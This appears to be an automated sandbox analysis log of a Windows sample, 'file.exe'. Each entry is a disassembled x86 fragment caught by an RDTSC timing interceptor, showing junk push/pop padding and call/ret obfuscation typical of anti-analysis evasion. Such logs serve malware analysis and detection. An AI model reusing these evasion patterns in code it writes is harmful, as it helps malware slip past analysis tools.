Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92D23A second address: 92D25A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FFBC8B2DAA4h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92D25A second address: 92D25E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92D3B0 second address: 92D3F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FFBC8B2DAA2h 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FFBC8B2DAA6h 0x00000011 ja 00007FFBC8B2DA96h 0x00000017 jo 00007FFBC8B2DA96h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92D3F0 second address: 92D3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92D6B0 second address: 92D6DB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FFBC8B2DAA0h 0x00000010 jne 00007FFBC8B2DA96h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b push ecx 0x0000001c push edi 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92DDEF second address: 92DDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92DDF4 second address: 92DE17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBC8B2DAA9h 0x00000009 jno 00007FFBC8B2DA96h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92DE17 second address: 92DE22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92DF40 second address: 92DF6F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FFBC8B2DAA9h 0x0000000e pop ecx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92DF6F second address: 92DF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92E123 second address: 92E12D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFBC8B2DA96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92E12D second address: 92E13B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FFBC91A3BD6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92E13B second address: 92E14D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FFBC8B2DAA2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92E14D second address: 92E15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FFBC91A3BD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FFBC91A3BD6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9314AC second address: 9314E2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFBC8B2DAAFh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FFBC8B2DA9Ch 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 903CDC second address: 903CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 933E94 second address: 933EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FFBC8B2DA9Eh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8F9CD6 second address: 8F9CF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBC91A3BE9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93B348 second address: 93B366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA6h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93B366 second address: 93B36A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93B4C3 second address: 93B4C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93B4C8 second address: 93B4D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FFBC91A3BD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93B4D4 second address: 93B4D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93B8E1 second address: 93B8F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBC91A3BDDh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93B8F5 second address: 93B8FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BACC second address: 93BAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BAD2 second address: 93BAD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BAD6 second address: 93BADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BADA second address: 93BB12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFBC8B2DAA8h 0x0000000b jmp 00007FFBC8B2DAA3h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BB12 second address: 93BB16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BB16 second address: 93BB22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BB22 second address: 93BB26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BB26 second address: 93BB2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BC74 second address: 93BC78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93C5EA second address: 93C5EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93C764 second address: 93C76D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93D65F second address: 93D666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93D666 second address: 93D670 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFBC91A3BDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93D71F second address: 93D73E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jnp 00007FFBC8B2DA9Ch 0x00000013 mov dword ptr [ebp+122D32D9h], edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e pop edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93D73E second address: 93D742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93DC5C second address: 93DC62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93E58F second address: 93E593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93E593 second address: 93E597 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93E4A1 second address: 93E4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93E597 second address: 93E59D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93E59D second address: 93E5A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93F552 second address: 93F561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 940009 second address: 940013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FFBC91A3BD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 940A59 second address: 940A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 940A5D second address: 940AF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jnp 00007FFBC91A3BD6h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FFBC91A3BE8h 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007FFBC91A3BD8h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 mov edi, ebx 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push eax 0x0000003c call 00007FFBC91A3BD8h 0x00000041 pop eax 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 add dword ptr [esp+04h], 00000016h 0x0000004e inc eax 0x0000004f push eax 0x00000050 ret 0x00000051 pop eax 0x00000052 ret 0x00000053 push 00000000h 0x00000055 and edi, 2076C458h 0x0000005b xchg eax, ebx 0x0000005c jo 00007FFBC91A3BEFh 0x00000062 push eax 0x00000063 push edx 0x00000064 push edx 0x00000065 pop edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 941571 second address: 94157A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 942D25 second address: 942D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 940830 second address: 940836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 940836 second address: 94083B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94083B second address: 940845 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFBC8B2DA9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9448AA second address: 9448B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9448B3 second address: 9448BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FFBC8B2DA96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9448BD second address: 9448C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 945F68 second address: 945FB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FFBC8B2DA9Dh 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FFBC8B2DA9Dh 0x00000013 jne 00007FFBC8B2DA96h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push edx 0x0000001d push edi 0x0000001e jmp 00007FFBC8B2DAA5h 0x00000023 pop edi 0x00000024 push eax 0x00000025 push edx 0x00000026 jne 00007FFBC8B2DA96h 0x0000002c push edi 0x0000002d pop edi 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94AB07 second address: 94AB11 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 941F5B second address: 941F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94CB45 second address: 94CB4F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFBC91A3BDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94DAE3 second address: 94DB6C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFBC8B2DAA3h 0x00000008 jmp 00007FFBC8B2DA9Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FFBC8B2DA98h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov ebx, eax 0x0000002c push 00000000h 0x0000002e jnc 00007FFBC8B2DA9Ch 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007FFBC8B2DA98h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 00000019h 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 push eax 0x00000051 pushad 0x00000052 push esi 0x00000053 push edi 0x00000054 pop edi 0x00000055 pop esi 0x00000056 pushad 0x00000057 jmp 00007FFBC8B2DAA7h 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94EBC7 second address: 94EBCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94EBCD second address: 94EBDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FFBC8B2DA96h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94EBDF second address: 94EBE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9521E0 second address: 952273 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FFBC8B2DAA4h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FFBC8B2DA98h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 mov dword ptr [ebp+122D2C77h], ecx 0x0000002f pushad 0x00000030 xor ecx, dword ptr [ebp+122D1FA2h] 0x00000036 or dword ptr [ebp+122D2C60h], esi 0x0000003c popad 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007FFBC8B2DA98h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 00000017h 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 add dword ptr [ebp+12456EC0h], ebx 0x0000005f push eax 0x00000060 pushad 0x00000061 jmp 00007FFBC8B2DAA1h 0x00000066 push ebx 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 948C2F second address: 948C49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBC91A3BE5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9531FB second address: 953200 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 953200 second address: 953222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FFBC91A3BD6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 jmp 00007FFBC91A3BE0h 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9541A1 second address: 954239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jno 00007FFBC8B2DAA2h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FFBC8B2DA98h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a pushad 0x0000002b xor cx, 4A37h 0x00000030 mov dword ptr [ebp+122D1F06h], esi 0x00000036 popad 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007FFBC8B2DA98h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 00000017h 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 mov edi, dword ptr [ebp+122D2439h] 0x00000059 mov ebx, dword ptr [ebp+12450FEBh] 0x0000005f push 00000000h 0x00000061 jmp 00007FFBC8B2DAA2h 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007FFBC8B2DA9Dh 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94CCCF second address: 94CCEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FFBC91A3BE1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95622E second address: 95624C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94CCEA second address: 94CD05 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFBC91A3BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFBC91A3BDFh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95624C second address: 956261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94ED6A second address: 94EE06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FFBC91A3BD8h 0x00000011 pop edx 0x00000012 nop 0x00000013 mov di, ax 0x00000016 call 00007FFBC91A3BDAh 0x0000001b sub ebx, dword ptr [ebp+122D3806h] 0x00000021 pop ebx 0x00000022 push dword ptr fs:[00000000h] 0x00000029 mov dword ptr [ebp+122D2962h], ecx 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 xor ebx, dword ptr [ebp+122D217Bh] 0x0000003c mov eax, dword ptr [ebp+122D0111h] 0x00000042 push 00000000h 0x00000044 push edx 0x00000045 call 00007FFBC91A3BD8h 0x0000004a pop edx 0x0000004b mov dword ptr [esp+04h], edx 0x0000004f add dword ptr [esp+04h], 00000019h 0x00000057 inc edx 0x00000058 push edx 0x00000059 ret 0x0000005a pop edx 0x0000005b ret 0x0000005c push FFFFFFFFh 0x0000005e push 00000000h 0x00000060 push ebx 0x00000061 call 00007FFBC91A3BD8h 0x00000066 pop ebx 0x00000067 mov dword ptr [esp+04h], ebx 0x0000006b add dword ptr [esp+04h], 00000018h 0x00000073 inc ebx 0x00000074 push ebx 0x00000075 ret 0x00000076 pop ebx 0x00000077 ret 0x00000078 nop 0x00000079 jp 00007FFBC91A3BE0h 0x0000007f pushad 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94EE06 second address: 94EE13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95720B second address: 957210 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95B39B second address: 95B3A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95B3A1 second address: 95B3A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
